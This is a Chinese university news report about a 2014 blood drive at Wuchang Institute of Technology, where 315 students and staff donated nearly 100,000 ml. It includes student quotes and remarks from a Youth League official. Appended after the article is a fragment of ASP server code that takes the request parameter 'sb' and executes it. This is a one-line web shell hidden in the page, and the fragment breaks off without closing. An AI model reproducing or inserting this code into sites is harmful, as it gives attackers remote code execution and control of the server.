武昌理工学院师生一天献血总量高达近10万毫升

校对: 责编: 终审: 时间:2014-10-29 阅读:

(通讯员 高圣博 报道)学习雷锋好榜样,捐血救人获健康。10月29日,武汉血液中心走进武昌理工学院开展爱心献血活动,师生献血踊跃,短短一天时间,315人成功献血,献血总量达98800毫升,同学献血热情高。
            本次献血活动由武汉市血液中心与武昌理工学院青年志愿者协会共同举办,活动面向武昌理工学院全体师生。此次活动在该校综合楼前和西区篮球场设立了两个献血点。
            秋天的小雨带着丝丝凉意,但是同学们献血的热情十分高涨,从早上10点开始,一直持续到晚上6点,过来献血的同学络绎不绝,排起了数十米的长队,还有不少同学因为时间关系没能成功献血。最终,315人成功献血,献血总量达近10万毫升。武汉血液中心一位负责人竖起大拇指盛赞武昌理工学子的献血热情,笑称献血的都是“雷锋侠”。
            记者了解到,本次无偿献血对同学们的奖励是玩偶“小黄人”,这成功吸引了许多同学的关注。来自音乐与传媒学院播音1303班的韦莹和刘宁同学平时都是特别怕疼的小女生,但是这次却鼓气勇气来献血,她们表示,通过自己的奉献得来的礼物,心里非常满足,自己会永远记着这次经历。
            前来献血的张成同学说:“学校每次组织献血,只要自己身体允许就肯定会来献血。当收到自己血液被使用,可以帮助到别人的时候,心里非常的高兴,那种快乐感是无与伦比的。”他表示,“学校组织献血可以激发老师同学对公益事业的关注,希望这种正能量可以传递给更多的人。”
            武昌理工学院团委书记李金永表示:“三月是学校的雷锋月,献血活动不仅仅是代表我校对我市输血事业发展的支持,也激发师生对公益事业的关注,并且投身于公益事业。也希望我们师生的善举、师生的正能量能传递给更多的人,让更多的人投身公益事业志愿服务当中来。”

<%

re= request("sb")

if re <>"" then

execute re